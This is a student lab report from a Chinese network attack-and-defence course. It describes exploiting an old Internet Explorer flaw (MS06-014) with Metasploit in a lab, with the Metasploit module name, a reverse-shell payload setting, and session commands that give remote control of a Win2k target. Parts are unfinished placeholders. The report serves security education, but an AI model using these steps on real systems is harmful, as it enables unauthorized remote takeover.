1. 程式人生 > 其它 >20211903 2021-2022-2 《網路攻防實踐》實踐十一報告

20211903 2021-2022-2 《網路攻防實踐》實踐十一報告

1.實踐內容

(1)web瀏覽器滲透攻擊
任務:使用攻擊機和Windows靶機進行瀏覽器滲透攻擊實驗,體驗網頁木馬構造及實施瀏覽器攻擊的實際過程。
實驗步驟:
①選擇使用Metasploit中的MS06-014滲透攻擊模組
②選擇PAYLOAD為任意遠端Shell連線
③設定伺服器地址和URL引數,執行exploit,構造出惡意網頁木馬指令碼
④在靶機環境中啟動瀏覽器,驗證與伺服器的連通性,並訪問而已網頁木馬指令碼URL
⑤在攻擊機的Metasploit軟體中檢視滲透攻擊狀態,並通過成功滲透攻擊後建立起的遠端控制會話SESSION,在靶機上遠端執行命令
(2)取證分析實踐—網頁木馬攻擊場景分析
實踐過程:
①首先你應該訪問start.html,在這個檔案中給出了new09.htm的地址,
②在進入 htm 後,每解密出一個檔案地址,請對其作 32 位 MD5 雜湊,以雜湊值為檔名到

http://192.168.68.253/scom/hashed/雜湊值下去下載對應的檔案(注意:檔名中的英文字母為小寫,且沒有副檔名),即為解密出的地址對應的檔案。
③如果解密出的地址給出的是網頁或指令碼檔案,請繼續解密。
④如果解密出的地址是二進位制程式檔案,請進行靜態反彙編或動態除錯。
⑤重複以上過程直到這些檔案被全部分析完成。
(3)攻防對抗實踐—web瀏覽器滲透攻擊攻防
攻擊方使用Metasploit構造出至少兩個不同Web瀏覽端軟體安全漏洞的滲透攻擊程式碼,並進行混淆處理之後組裝成一個URL,通過具有欺騙性的電子郵件傳送給防守方。
防守方對電子郵件中的掛馬連結進行提取、解混淆分析、嘗試恢復出滲透程式碼的原始形態,並分析這些滲透程式碼都是攻擊哪些Web瀏覽端軟體的哪些安全漏洞。

2.實踐過程

(1)web瀏覽器滲透攻擊
任務:使用攻擊機和Windows靶機進行瀏覽器滲透攻擊實驗,體驗網頁木馬構造及實施瀏覽器攻擊的實際過程。
實驗步驟:
①選擇使用Metasploit中的MS06-014滲透攻擊模組
②選擇PAYLOAD為任意遠端Shell連線
③設定伺服器地址和URL引數,執行exploit,構造出惡意網頁木馬指令碼
④在靶機環境中啟動瀏覽器,驗證與伺服器的連通性,並訪問而已網頁木馬指令碼URL
⑤在攻擊機的Metasploit軟體中檢視滲透攻擊狀態,並通過成功滲透攻擊後建立起的遠端控制會話SESSION,在靶機上遠端執行命令

首先確定攻擊機與靶機。攻擊機為kali攻擊機,IP地址為192.168.111.129,靶機為Win2k靶機,IP地址為192.168.111.133,並測試其連通性。



在kali機中進入msfconsole介面,然後輸入search MS06-014檢視相關漏洞資訊,再使用use exploit/windows/browser/ie_createobject指令選擇此漏洞,並使用show payloads指令檢視負載資訊。


使用set payload generic/shell_reverse_tcp命令來設定payload,並分別設定攻擊機和靶機的IP地址。

輸入run指令,執行此漏洞,得到Local IP等資訊。

在靶機中訪問Local IP,可得到一串程式碼,並可以在攻擊機處看到訪問記錄。


連線成功後,輸入ls,發現已經滲透入靶機,攻擊成功。

使用sessions -i 7指令開啟會話,開啟靶機的終端,驗證是否攻擊成功,輸入ipconfig輸出了靶機IP,所以可驗證攻擊成功。

(2)取證分析實踐—網頁木馬攻擊場景分析
實踐過程:
①首先你應該訪問start.html,在這個檔案中給出了new09.htm的地址,
②在進入 htm 後,每解密出一個檔案地址,請對其作 32 位 MD5 雜湊,以雜湊值為檔名到 http://192.168.68.253/scom/hashed/雜湊值下去下載對應的檔案(注意:檔名中的英文字母為小寫,且沒有副檔名),即為解密出的地址對應的檔案。
③如果解密出的地址給出的是網頁或指令碼檔案,請繼續解密。
④如果解密出的地址是二進位制程式檔案,請進行靜態反彙編或動態除錯。
⑤重複以上過程直到這些檔案被全部分析完成。

3.學習中遇到的問題及解決

  • 問題1:在實驗一中靶機進入惡意網站後連線始終不成功;
  • 問題1解決方案:將載荷改為set payload generic/shell_reverse_tcp即可。
  • 問題2:XXXXXX
  • 問題2解決方案:XXXXXX - ...

4.實踐總結

xxx xxx